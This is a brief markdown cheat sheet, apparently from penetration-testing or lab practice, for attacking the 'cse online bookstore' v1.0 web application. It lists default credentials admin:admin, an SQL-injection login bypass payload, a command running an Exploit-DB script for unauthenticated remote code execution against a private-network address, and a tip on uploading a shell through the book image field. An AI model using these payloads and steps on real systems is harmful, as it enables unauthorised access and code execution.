# cse online bookstore

### Default Creds

```bash
admin:admin
```

## v1.0

```
https://www.exploit-db.com/exploits/48960 - Auth Bypass
using admin:%' or '1'='1 

https://www.exploit-db.com/exploits/47887 - Unauth RCE
$ python3 47887.py http://192.168.129.111/store/

# Authenticated RCE
# change image for a book and upload shell
```